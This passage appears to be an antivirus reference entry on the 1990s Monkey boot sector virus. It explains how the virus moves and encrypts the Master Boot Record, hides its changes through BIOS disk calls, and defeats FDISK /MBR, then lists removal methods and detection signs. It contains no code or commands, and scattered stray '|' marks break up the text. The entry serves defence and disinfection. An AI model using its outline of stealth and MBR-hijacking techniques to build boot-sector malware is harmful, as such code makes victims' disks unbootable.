year 1991. The virus spread quickly to USA, Australia and UK.
|
||
|
Monkey is one of the most common boot sector viruses.
|
||
|
|
||
|
As the name indicates, Monkey is a distant relative of Stoned.
|
||
|
Its technical properties make it quite a remarkable virus,
|
||
|
however. The virus infects the Master Boot Records of hard disks
|
||
|
and the DOS boot records of diskettes, just like Stoned. Monkey
|
||
|
spreads only through diskettes.
|
||
|
|
||
|
Monkey does not let the original partition table remain in its
proper place in the Master Boot Record, as Stoned does. Instead
it moves the whole Master Boot Record to the hard disk's third
sector and replaces it with its own code. The hard disk is
inaccessible after a diskette boot, since the operating system
cannot find valid partition data in the Master Boot Record;
attempts to use the hard disk result in the DOS error message
"Invalid drive specification".
|
||
|
|
||
|
When the computer is booted from the hard disk, the virus is
|
||
|
executed first, and the hard disk can thereafter be used
|
||
|
normally. The virus is not, therefore, easily noticeable, unless
|
||
|
the computer is booted from a diskette.
|
||
|
|
||
|
The fact that Monkey encrypts the Master Boot Record, besides
relocating it on the disk, makes the virus still more difficult to
remove. The changes to the Master Boot Record cannot be detected
while the virus is active, since it reroutes the BIOS-level disk
calls through its own code. Upon inspection, the hard disk seems
to be in its original shape.
|
||
|
|
||
|
The relocation and encryption of the partition table render two
|
||
|
often-used disinfection procedures unviable. One of these is the
|
||
|
MS-DOS command FDISK /MBR, capable of removing most viruses that
|
||
|
infect Master Boot Records. The other is using a disk editor to
|
||
|
restore the Master Boot Record back on the zero track. Although
|
||
|
both of these procedures destroy the actual virus code, the
|
||
|
computer cannot be booted from the hard disk afterwards.
|
||
|
|
||
|
There are five different ways to remove the Monkey
|
||
|
virus:
|
||
|
o The original Master Boot Record and partition table can
|
||
|
be restored from a backup taken before the infection.
|
||
|
Such a backup can be made by using, for example, the
|
||
|
MIRROR /PARTN command of MS-DOS 5.
|
||
|
|
||
|
o The hard disk can be repartitioned by using the FDISK
|
||
|
program, after which the logical disks must be formatted.
|
||
|
All data on the hard disk will consequently be lost,
|
||
|
however.
|
||
|
|
||
|
o The virus code can be overwritten by using FDISK/MBR, and
|
||
|
the partition table restored manually. In this case, the
|
||
|
partition values of the hard disk must be calculated and
|
||
|
inserted in the partition table with the help of a disk
|
||
|
editor. The method requires expert knowledge of the disk
|
||
|
structure, and its success is doubtful.
|
||
|
|
||
|
o It is possible to exploit Monkey's stealth capabilities
by taking a copy of the zero track while the virus is
active. Since the virus hides the changes it has made,
this copy will actually contain the original Master Boot
Record. This method is not recommended, because the
diskettes used in the copying may well get infected.
|
||
|
|
||
|
o The original zero track can be located, decrypted and
|
||
|
moved back to its proper place. As a result, the hard
|
||
|
disk is restored to its exact original state. F-PROT uses
|
||
|
this method to disinfect the Monkey virus.
|
||
|
|
||
|
It is difficult to spot the virus, since it does not activate in
|
||
|
any way. A one-kilobyte reduction in DOS memory is the only
|
||
|
obvious sign of its presence. The memory can be checked with, for
|
||
|
instance, DOS's CHKDSK and MEM programs. However, even if MEM
|
||
|
reports that the computer has 639 kilobytes of basic memory
|
||
|
instead of the more common 640 kilobytes, it does not necessarily
|
||
|
mean that the computer is infected. In many computers, the BIOS
|
||
|
allocates one kilobyte of basic memory for its own use.
|
||
|
|
||
|
The Monkey virus is quite compatible with different diskette
|
||
|
types. It carries a table containing data for the most common
|
||
|
diskettes. Using this table, the virus is able to move a
|
||
|
diskette's original boot record and a part of its own code to a
|
||
|
safe area on the diskette. Monkey does not recognize 2.88
|
||
|
megabyte ED diskettes, however, and partly overwrites their File
|
||
|
Allocation Tables.
|
||
|
|
||
|
|